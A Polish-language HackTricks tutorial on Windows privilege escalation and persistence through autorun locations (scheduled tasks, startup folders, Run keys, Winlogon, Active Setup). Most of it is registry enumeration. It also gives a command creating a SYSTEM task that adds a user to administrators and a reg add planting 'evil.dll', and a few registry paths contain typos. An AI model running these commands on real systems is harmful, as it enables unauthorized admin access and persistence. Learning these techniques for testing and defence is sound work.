24 KiB
Podwyższanie Uprawnień z Autoruns
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się sztuczkami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.
Wskazówka dotycząca bug bounty: zarejestruj się w Intigriti, premium platformie bug bounty stworzonej przez hackerów, dla hackerów! Dołącz do nas na https://go.intigriti.com/hacktricks już dziś i zacznij zarabiać nagrody do 100 000 USD!
{% embed url="https://go.intigriti.com/hacktricks" %}
WMIC
Wmic może być używany do uruchamiania programów przy uruchamianiu. Zobacz, które binaria są zaprogramowane do uruchomienia przy starcie:
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Zaplanowane zadania
Zadania mogą być zaplanowane do uruchomienia z określoną częstotliwością. Zobacz, które binaria są zaplanowane do uruchomienia za pomocą:
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
Folders
Wszystkie pliki binarne znajdujące się w folderach uruchamiania będą wykonywane przy starcie. Typowe foldery uruchamiania to te wymienione w kontynuacji, ale folder uruchamiania jest wskazany w rejestrze. Przeczytaj to, aby dowiedzieć się gdzie.
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
Rejestr
{% hint style="info" %} Uwaga stąd: Wpis rejestru Wow6432Node wskazuje, że używasz 64-bitowej wersji systemu Windows. System operacyjny używa tego klucza, aby wyświetlić oddzielny widok HKEY_LOCAL_MACHINE\SOFTWARE dla aplikacji 32-bitowych działających na 64-bitowych wersjach systemu Windows. {% endhint %}
Uruchomienia
Powszechnie znane wpisy rejestru AutoRun:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx
Klucze rejestru znane jako Run i RunOnce są zaprojektowane do automatycznego uruchamiania programów za każdym razem, gdy użytkownik loguje się do systemu. Wartość danych przypisana do klucza jest ograniczona do 260 znaków lub mniej.
Uruchomienia usług (mogą kontrolować automatyczne uruchamianie usług podczas rozruchu):
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
RunOnceEx:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceExHKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx
W systemach Windows Vista i nowszych klucze rejestru Run i RunOnce nie są automatycznie generowane. Wpisy w tych kluczach mogą bezpośrednio uruchamiać programy lub określać je jako zależności. Na przykład, aby załadować plik DLL podczas logowania, można użyć klucza rejestru RunOnceEx wraz z kluczem "Depend". Demonstruje to dodanie wpisu rejestru do wykonania "C:\temp\evil.dll" podczas uruchamiania systemu:
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
{% hint style="info" %} Eksploit 1: Jeśli możesz pisać w którymkolwiek z wymienionych rejestrów w HKLM, możesz podnieść uprawnienia, gdy inny użytkownik się zaloguje. {% endhint %}
{% hint style="info" %} Eksploit 2: Jeśli możesz nadpisać którykolwiek z binarnych plików wskazanych w którymkolwiek z rejestrów w HKLM, możesz zmodyfikować ten plik binarny, dodając tylne drzwi, gdy inny użytkownik się zaloguje i podnieść uprawnienia. {% endhint %}
#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Startup Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Skróty umieszczone w folderze Startup automatycznie uruchomią usługi lub aplikacje podczas logowania użytkownika lub ponownego uruchamiania systemu. Lokalizacja folderu Startup jest zdefiniowana w rejestrze zarówno dla zakresu Local Machine, jak i Current User. Oznacza to, że każdy skrót dodany do tych określonych lokalizacji Startup zapewni, że powiązana usługa lub program uruchomi się po procesie logowania lub ponownego uruchamiania, co czyni to prostą metodą planowania automatycznego uruchamiania programów.
{% hint style="info" %} Jeśli możesz nadpisać dowolny [User] Shell Folder w HKLM, będziesz mógł skierować go do folderu kontrolowanego przez Ciebie i umieścić backdoora, który zostanie wykonany za każdym razem, gdy użytkownik zaloguje się do systemu, eskalując uprawnienia. {% endhint %}
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Winlogon Keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Typowo klucz Userinit jest ustawiony na userinit.exe. Jednak jeśli ten klucz zostanie zmodyfikowany, określony plik wykonywalny również zostanie uruchomiony przez Winlogon po logowaniu użytkownika. Podobnie klucz Shell ma wskazywać na explorer.exe, który jest domyślnym powłoką dla systemu Windows.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
{% hint style="info" %} Jeśli możesz nadpisać wartość rejestru lub binarny plik, będziesz w stanie podnieść uprawnienia. {% endhint %}
Ustawienia polityki
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerHKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Sprawdź klucz Run.
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
AlternateShell
Zmiana wiersza poleceń w trybie awaryjnym
W rejestrze systemu Windows pod HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot znajduje się wartość AlternateShell ustawiona domyślnie na cmd.exe. Oznacza to, że gdy wybierasz "Tryb awaryjny z wierszem poleceń" podczas uruchamiania (naciskając F8), używany jest cmd.exe. Jednak możliwe jest skonfigurowanie komputera tak, aby automatycznie uruchamiał się w tym trybie bez potrzeby naciskania F8 i ręcznego wyboru.
Kroki do utworzenia opcji uruchamiania w celu automatycznego uruchamiania w "Trybie awaryjnym z wierszem poleceń":
- Zmień atrybuty pliku
boot.ini, aby usunąć flagi tylko do odczytu, systemowe i ukryte:attrib c:\boot.ini -r -s -h - Otwórz
boot.inido edycji. - Wstaw linię taką jak:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL) - Zapisz zmiany w
boot.ini. - Ponownie zastosuj oryginalne atrybuty pliku:
attrib c:\boot.ini +r +s +h
- Eksploatacja 1: Zmiana klucza rejestru AlternateShell pozwala na niestandardową konfigurację powłoki poleceń, potencjalnie umożliwiając nieautoryzowany dostęp.
- Eksploatacja 2 (Uprawnienia do zapisu w PATH): Posiadanie uprawnień do zapisu w dowolnej części zmiennej systemowej PATH, szczególnie przed
C:\Windows\system32, pozwala na uruchomienie niestandardowegocmd.exe, który może być tylnym wejściem, jeśli system zostanie uruchomiony w trybie awaryjnym. - Eksploatacja 3 (Uprawnienia do zapisu w PATH i boot.ini): Dostęp do zapisu w
boot.iniumożliwia automatyczne uruchamianie w trybie awaryjnym, ułatwiając nieautoryzowany dostęp przy następnym uruchomieniu.
Aby sprawdzić bieżące ustawienie AlternateShell, użyj tych poleceń:
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
Zainstalowany komponent
Active Setup to funkcja w systemie Windows, która inicjuje się przed pełnym załadowaniem środowiska pulpitu. Priorytetowo wykonuje określone polecenia, które muszą zakończyć się przed kontynuowaniem logowania użytkownika. Proces ten zachodzi nawet przed uruchomieniem innych wpisów startowych, takich jak te w sekcjach rejestru Run lub RunOnce.
Active Setup jest zarządzany przez następujące klucze rejestru:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
W obrębie tych kluczy istnieje wiele podkluczy, z których każdy odpowiada konkretnemu komponentowi. Kluczowe wartości, które są szczególnie interesujące, to:
- IsInstalled:
0oznacza, że polecenie komponentu nie zostanie wykonane.1oznacza, że polecenie zostanie wykonane raz dla każdego użytkownika, co jest domyślnym zachowaniem, jeśli wartośćIsInstalledjest nieobecna.- StubPath: Definiuje polecenie, które ma być wykonane przez Active Setup. Może to być dowolna poprawna linia poleceń, na przykład uruchomienie
notepad.
Wskazówki dotyczące bezpieczeństwa:
- Modyfikacja lub zapis do klucza, w którym
IsInstalledjest ustawione na"1"z określonymStubPath, może prowadzić do nieautoryzowanego wykonania polecenia, potencjalnie w celu eskalacji uprawnień. - Zmiana pliku binarnego, do którego odnosi się jakakolwiek wartość
StubPath, również może osiągnąć eskalację uprawnień, pod warunkiem posiadania wystarczających uprawnień.
Aby sprawdzić konfiguracje StubPath w komponentach Active Setup, można użyć następujących poleceń:
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
Browser Helper Objects
Przegląd Browser Helper Objects (BHO)
Browser Helper Objects (BHO) to moduły DLL, które dodają dodatkowe funkcje do Internet Explorera firmy Microsoft. Ładują się do Internet Explorera i Eksploratora Windows przy każdym uruchomieniu. Jednak ich wykonanie można zablokować, ustawiając klucz NoExplorer na 1, co uniemożliwia ich ładowanie z instancjami Eksploratora Windows.
BHO są kompatybilne z Windows 10 za pośrednictwem Internet Explorera 11, ale nie są obsługiwane w Microsoft Edge, domyślnym przeglądarki w nowszych wersjach Windows.
Aby zbadać BHO zarejestrowane w systemie, można sprawdzić następujące klucze rejestru:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsHKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Każde BHO jest reprezentowane przez swój CLSID w rejestrze, który służy jako unikalny identyfikator. Szczegółowe informacje o każdym CLSID można znaleźć pod HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}.
Aby zapytać o BHO w rejestrze, można wykorzystać następujące polecenia:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
Rozszerzenia Internet Explorer
HKLM\Software\Microsoft\Internet Explorer\ExtensionsHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions
Zauważ, że rejestr będzie zawierał 1 nowy wpis rejestru dla każdej dll, który będzie reprezentowany przez CLSID. Informacje o CLSID można znaleźć w HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}
Sterowniki czcionek
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font DriversHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Otwórz polecenie
HKLM\SOFTWARE\Classes\htmlfile\shell\open\commandHKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
Opcje wykonania pliku obrazu
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
SysInternals
Zauważ, że wszystkie strony, na których można znaleźć autoruny, zostały już przeszukane przez winpeas.exe. Jednak dla bardziej szczegółowej listy automatycznie wykonywanych plików możesz użyć autoruns z sysinternals:
autorunsc.exe -m -nobanner -a * -ct /accepteula
More
Znajdź więcej Autoruns, takich jak rejestry w https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
References
- https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref
- https://attack.mitre.org/techniques/T1547/001/
- https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
- https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell
Bug bounty tip: zarejestruj się w Intigriti, premium platformie bug bounty stworzonej przez hackerów, dla hackerów! Dołącz do nas na https://go.intigriti.com/hacktricks już dziś i zacznij zarabiać nagrody do 100 000 USD!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.